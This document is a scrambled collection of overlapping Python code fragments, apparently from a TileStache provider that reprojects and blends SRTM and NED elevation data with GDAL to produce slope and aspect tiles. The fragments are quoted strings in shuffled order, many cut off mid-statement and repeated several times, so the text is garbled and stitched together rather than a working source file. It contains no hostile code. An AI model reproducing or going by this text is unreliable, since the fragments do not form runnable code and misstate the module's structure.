Return", "#bottom, top = SRTM3, SRTM1 # SRTM1 looks terrible bottom, top = SRTM3,", "raster density across source DEM and output dem_samples = (maxlon - minlon) /", "< NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top = NED1km, NED100m elif", "version of the composite without the # current layer applied for later alpha-blending.", "proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate", "def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair of arrays 2 pixels", "2 pixels smaller than the input elevation array. Slope is returned in radians,", "as NED10m or NED1km, and the proportions must all add up to one.", "\"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the Provider object", "window[7] + window[7] + window[8]) \\ - (window[0] + window[1] + window[1] +", "for DEM retrieval utilities. \"\"\" from math import pi, sin, cos from os", "datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete", "composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion)", "* elevation[row:(row + height), col:(col + width)] for (row, col) in product(range(3), range(3))]", "2 window = [z * elevation[row:(row + height), col:(col + width)] for (row,", "pair of arrays 2 pixels smaller than the input elevation array. Slope is", "0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\"", "= numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\" Load external function based", "TileStache provider for generating tiles of DEM slope and aspect data. 
Source parameter", "1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers]) ==", "#bottom, top = SRTM1, NED10m # SRTM1 looks terrible bottom, top = SRTM3,", "a module such as SRTM1 or SRTM3, and the proportions must all add", "aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0, ymax, 0, yres", "<= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom:", "\\ - (window[2] + window[5] + window[5] + window[8])) \\ / (8.0 *", "+ yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax - yres) #", "== webmerc_proj.srs # <-- good enough for now if self.source == 'srtm-ned': providers", "bbox buffered by one pixel on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin", "if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir for", "SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def name(self): return '.'", "output, self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular region from the current", "if _func is None: raise Exception('eval(%(objname)s) in %(modname)s came up None' % locals())", "Disk from osgeo import gdal, osr from PIL import Image import numpy from", "lower pixels. Not yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a", "zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion =", "applied for later alpha-blending. # do_blending = bool(proportion_complete > 0 and proportion <", "with left, upper, right, and lower pixels. Not yet implemented! \"\"\" raise NotImplementedError()", "# Keep a version of the composite without the # current layer applied", "parameter can be \"srtm-ned\" (default) or \"ned-only\". 
See http://tilestache.org/doc/#custom-providers for information on how", "TileStache.Core import Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches import Disk from", "osr from PIL import Image import numpy from .. import save_slope_aspect # used", "two items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom <", "y = ((window[6] + window[7] + window[7] + window[8]) \\ - (window[0] +", "* xres); y = ((window[6] + window[7] + window[7] + window[8]) \\ -", "tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source = source def getTypeByExtension(self,", "proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of data sources and proportions for", "eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in %(modname)s came up None'", "from TileStache.Caches import Disk from osgeo import gdal, osr from PIL import Image", "and the proportions must all add up to one. Return list has either", "ymax - yres) # # Keep a version of the composite without the", "stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None", "\"\"\" Return a pair of arrays 2 pixels smaller than the input elevation", "2, elevation.shape[1] - 2 window = [z * elevation[row:(row + height), col:(col +", "1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without", "srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return an instance of SlopeAndAspect for", "= aspect self.w, self.h = self.slope.shape self.wkt = wkt self.xform = xform def", "up some useful projections. 
# osr.UseExceptions() # <-- otherwise errors will be silent", "other than TIFF for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt,", "itertools import product from tempfile import mkstemp from sys import modules import NED10m,", "area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0, ymax - yres,", "output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin)", "height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres,", "top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference =", "radians, counterclockwise from -pi at north around to pi. Logic here is borrowed", "PIL-like save() and crop() methods. This object knows only how to save two-band", "object with PIL-like save() and crop() methods. This object knows only how to", "0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a", "the current image. Box is a 4-tuple with left, upper, right, and lower", "numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from -pi at north back to", "driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0,", "later alpha-blending. 
# do_blending = bool(proportion_complete > 0 and proportion < 1) if", "-9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return", "gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # # Perform alpha-blending if", "Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import Layer,", "of data sources and proportions for given zoom level. Each data source is", "product from tempfile import mkstemp from sys import modules import NED10m, NED100m, NED1km,", "object knows only how to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information", "either one or two items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)]", "density across source DEM and output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1]", "< NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top = NED100m, NED10m elif", "- yres, 0, yres # # Reproject and merge DEM datasources into destination", "do_blending = bool(proportion_complete > 0 and proportion < 1) if do_blending: composite_without =", "self.tmpdir = tmpdir self.demdir = demdir self.source = source def getTypeByExtension(self, ext): if", "directory. 
\"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache =", "< SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1 looks terrible bottom, top", "else: # cubic spline looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds,", "Metatile from TileStache.Config import Configuration from TileStache.Caches import Disk from osgeo import gdal,", "window[8])) \\ / (8.0 * xres); y = ((window[6] + window[7] + window[7]", "Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider =", "- (window[0] + window[1] + window[1] + window[2])) \\ / (8.0 * yres);", "composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete +=", "minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples >", "<gh_stars>10-100 \"\"\" Starting point for DEM retrieval utilities. \"\"\" from math import pi,", "and projection. # xres = (xmax - xmin) / width yres = (ymin", "driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0.", "xres, ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax -", "Each data source is a module such as SRTM1 or SRTM3, and the", "bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom:", "or NED1km, and the proportions must all add up to one. Return list", "from -pi at north back to pi aspect = numpy.arctan2(x, y) return slope,", "# Reproject and merge DEM datasources into destination datasets. # driver = gdal.GetDriverByName('GTiff')", "some useful projections. # osr.UseExceptions() # <-- otherwise errors will be silent and", "datasources into destination datasets. 
# driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform,", "composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # # Perform alpha-blending if needed.", "= ((window[6] + window[7] + window[7] + window[8]) \\ - (window[0] + window[1]", "(window[0] + window[1] + window[1] + window[2])) \\ / (8.0 * yres); #", "layer for preparing tiled data. Intended for use in hillup-seed.py script for preparing", "source) def name(self): return '.' class Provider: \"\"\" TileStache provider for generating tiles", "xres = (xmax - xmin) / width yres = (ymin - ymax) /", "composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None", "list has either one or two items. \"\"\" if zoom <= SRTM3.ideal_zoom: return", "self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular region", "with array of slope and aspect, and minimal geographic information. \"\"\" self.tmpdir =", "object. \"\"\" if format != 'TIFF': raise Exception('File format other than TIFF for", "pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from -pi at north", "Starting point for DEM retrieval utilities. \"\"\" from math import pi, sin, cos", "aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box):", "/ difference return [(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width, height, xform,", "tmpdir self.slope = slope self.aspect = aspect self.w, self.h = self.slope.shape self.wkt =", "\\ / (8.0 * xres); y = ((window[6] + window[7] + window[7] +", "DEM slope and aspect data. Source parameter can be \"srtm-ned\" (default) or \"ned-only\".", "function based on a path. Example funcpath: \"Module.Submodule:Function\". 
\"\"\" modname, objname = funcpath.split(':',", "choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP, 1)] elif self.source == 'worldwide':", "how the SlopeAndAspect object interacts with TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect,", "Exception('File format other than TIFF for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope,", "box): \"\"\" Returns a rectangular region from the current image. Box is a", "= choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp':", "composite_ds = None # # Calculate and save slope and aspect. # slope,", "[(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top =", "0. for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a", "dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) /", "= Provider(self, demdir, tmpdir, source) def name(self): return '.' class Provider: \"\"\" TileStache", "mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt)", "- 2 window = [z * elevation[row:(row + height), col:(col + width)] for", "= elevation.shape[0] - 2, elevation.shape[1] - 2 window = [z * elevation[row:(row +", "format): \"\"\" Save a two-band GeoTIFF to output file-like object. \"\"\" if format", "NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top = NED1km, NED100m elif zoom", "SRTM1 # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom ==", "+ width)] for (row, col) in product(range(3), range(3))] x = ((window[0] + window[3]", "width yres = (ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform =", "elif self.source == 'vfp': providers = [(VFP, 1)] elif self.source == 'worldwide': providers", "all add up to one. 
Return list has either one or two items.", "in providers]) == 1.0 # # Prepare information for datasets of the desired", "Slope is returned in radians, from 0 for sheer face to pi/2 for", "information for datasets of the desired extent and projection. # xres = (xmax", "module such as NED10m or NED1km, and the proportions must all add up", "NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) -", "\"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and", "< zoom and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1", "window[1] + window[1] + window[2])) \\ / (8.0 * yres); # in radians,", "and merge DEM datasources into destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds =", "yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax - yres) # #", "composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): #", "tiles of DEM slope and aspect data. Source parameter can be \"srtm-ned\" (default)", "- (window[2] + window[5] + window[5] + window[8])) \\ / (8.0 * xres);", "# Set up some useful projections. 
# osr.UseExceptions() # <-- otherwise errors will", "/ (8.0 * yres); # in radians, from 0 to pi/2 slope =", "elif self.source == 'worldwide': providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert", "[(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom, top =", "srs == webmerc_proj.srs # <-- good enough for now if self.source == 'srtm-ned':", "\"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir", "# cubic spline looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(),", "zoom and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1 looks", "SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible bottom, top = SRTM3, NED10m", "+ height), col:(col + width)] for (row, col) in product(range(3), range(3))] x =", "\"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir,", "maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax - yres) # # Keep", "= (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1]", "and lower pixels. Not yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return", "looks terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom", "+ window[5] + window[8])) \\ / (8.0 * xres); y = ((window[6] +", "pixel on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin +", "[(SRTM1, 1)] # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom", "array of slope and aspect, and minimal geographic information. \"\"\" self.tmpdir = tmpdir", "DEM datasources into destination datasets. 
# driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2,", "NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. -", "pi. Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0]", "xmin, ymin, xmax, ymax, zoom): \"\"\" Return an instance of SlopeAndAspect for requested", "self.slope.shape self.wkt = wkt self.xform = xform def save(self, output, format): \"\"\" Save", "composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and save slope and aspect.", "alpha-blending. # do_blending = bool(proportion_complete > 0 and proportion < 1) if do_blending:", "ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile from", "maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax - yres) # # Keep a", "Instantiate with array of slope and aspect, and minimal geographic information. \"\"\" self.tmpdir", "proportions must all add up to one. Return list has either one or", "\"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(),", "SRTM3, SRTM1 # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom", "elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion", "NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom,", "NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom,", "/ (8.0 * xres); y = ((window[6] + window[7] + window[7] + window[8])", "zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom <", "vsimem_counter = 1 # # Set up some useful projections. 
# osr.UseExceptions() #", "composite_ds.GetProjection(), resample) ds_dem = None # # Perform alpha-blending if needed. # if", "than the input elevation array. Slope is returned in radians, from 0 for", "#bottom, top = NED1km, NED100m bottom, top = NED1km, NED100m elif zoom ==", "= 0. for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get", "and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1 looks terrible", "composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0])", "/ width yres = (ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform", "GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object interacts with TileStache.", "point for DEM retrieval utilities. \"\"\" from math import pi, sin, cos from", "osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled data.", "(8.0 * xres); y = ((window[6] + window[7] + window[7] + window[8]) \\", "renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return an instance", "ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def", "sys import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core", "for use in hillup-seed.py script for preparing a tile directory. 
\"\"\" def __init__(self,", "- xmin) / width yres = (ymin - ymax) / height area_wkt =", "/vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up some useful", "_func is None: raise Exception('eval(%(objname)s) in %(modname)s came up None' % locals()) return", "float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\"", "one or two items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif", "slope and aspect data. Source parameter can be \"srtm-ned\" (default) or \"ned-only\". See", "[(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of", "SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches import", "self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular region from the", "or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the Provider object interacts with", "8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object interacts with", "zoom and zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top =", "+ y*y)) # in radians counterclockwise, from -pi at north back to pi", "the Provider object interacts with TileStache. 
\"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'):", "handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1,", "y*y)) # in radians counterclockwise, from -pi at north back to pi aspect", "and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1 looks terrible", "# SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom:", "source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source = source def getTypeByExtension(self, ext):", "0 and proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon,", "<= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom:", "minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate the raster density", "gdal, osr from PIL import Image import numpy from .. import save_slope_aspect #", "# used to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1", "def choose_providers_srtm(zoom): \"\"\" Return a list of data sources and proportions for given", "based on a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1)", "NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import", "TileStache response object with PIL-like save() and crop() methods. 
This object knows only", "TileStache.Config import Configuration from TileStache.Caches import Disk from osgeo import gdal, osr from", "(window[2] + window[5] + window[5] + window[8])) \\ / (8.0 * xres); y", "z = cs2cs.TransformPoint(xmax + xres, ymax - yres) # # Keep a version", "terrible bottom, top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)]", "demdir self.source = source def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception()", "= gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width,", "funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module = modules[modname] _func", "level. Each data source is a module such as NED10m or NED1km, and", "col) in product(range(3), range(3))] x = ((window[0] + window[3] + window[3] + window[6])", "minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat, z", "ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax - yres)", "'TIFF' def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return", "z = cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax", "= composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args):", "the proportions must all add up to one. Return list has either one", "= SRTM3, SRTM1 # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif", "= None # # Calculate and save slope and aspect. # slope, aspect", "a version of the composite without the # current layer applied for later", "= proportion / (proportion_complete + proportion) proportion_without = 1 - proportion_with composite_with =", "get a lat/lon bbox buffered by one pixel on all sides minlon, minlat,", "Provider object interacts with TileStache. 
\"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir", "a lat/lon bbox buffered by one pixel on all sides minlon, minlat, z", "area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with PIL-like save() and crop()", "== 1.0 # # Prepare information for datasets of the desired extent and", "from sys import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from", "proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered", "class Provider: \"\"\" TileStache provider for generating tiles of DEM slope and aspect", "import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import", "demdir, tmpdir, source) def name(self): return '.' class Provider: \"\"\" TileStache provider for", "self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular region from", "\"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of data sources and", "z=1.0): \"\"\" Return a pair of arrays 2 pixels smaller than the input", "out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None #", "maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate the raster density across source", "proportion / (proportion_complete + proportion) proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray()", "terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom <", "PIL import Image import numpy from .. 
import save_slope_aspect # used to prevent", "return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with", "size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config,", "* proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion", "tiled data. Intended for use in hillup-seed.py script for preparing a tile directory.", "one. Return list has either one or two items. \"\"\" if zoom <=", "looks terrible bottom, top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1,", "data sources and proportions for given zoom level. Each data source is a", "elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom", "- proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff')", "prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width,", "range(3))] x = ((window[0] + window[3] + window[3] + window[6]) \\ - (window[2]", "sum([proportion for (mod, proportion) in providers]) == 1.0 # # Prepare information for", "\"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\"", "make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename =", "Keep a version of the composite without the # current layer applied for", "elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m", "== NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom:", "See 
http://tilestache.org/doc/#custom-providers for information on how the Provider object interacts with TileStache. \"\"\"", "in radians counterclockwise, from -pi at north back to pi aspect = numpy.arctan2(x,", "0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None #", "if format != 'TIFF': raise Exception('File format other than TIFF for slope and", "# Perform alpha-blending if needed. # if do_blending: proportion_with = proportion / (proportion_complete", "= Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir,", "tmpdir, source) def name(self): return '.' class Provider: \"\"\" TileStache provider for generating", "here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] - 2,", "tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def name(self): return '.' class Provider:", "a pair of arrays 2 pixels smaller than the input elevation array. Slope", "top = SRTM3, SRTM1 # SRTM1 looks terrible bottom, top = SRTM3, NED10m", "elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m", "face to pi/2 for flat ground. Aspect is returned in radians, counterclockwise from", "funcpath.split(':', 1) __import__(modname) module = modules[modname] _func = eval(objname, module.__dict__) if _func is", "for information on how the SlopeAndAspect object interacts with TileStache. 
\"\"\" def __init__(self,", "is None: raise Exception('eval(%(objname)s) in %(modname)s came up None' % locals()) return _func", "+ window[1] + window[1] + window[2])) \\ / (8.0 * yres); # in", "= bool(proportion_complete > 0 and proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray()", "= (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks", "list of data sources and proportions for given zoom level. Each data source", "on how the Provider object interacts with TileStache. \"\"\" def __init__(self, layer, demdir,", "self.provider = Provider(self, demdir, tmpdir, source) def name(self): return '.' class Provider: \"\"\"", "1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return", "\"\"\" Instantiate with array of slope and aspect, and minimal geographic information. \"\"\"", "from .. import save_slope_aspect # used to prevent clobbering in /vsimem/, see: #", "GeoTIFF to output file-like object. \"\"\" if format != 'TIFF': raise Exception('File format", "NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom)", "bottom, top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference", "hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] 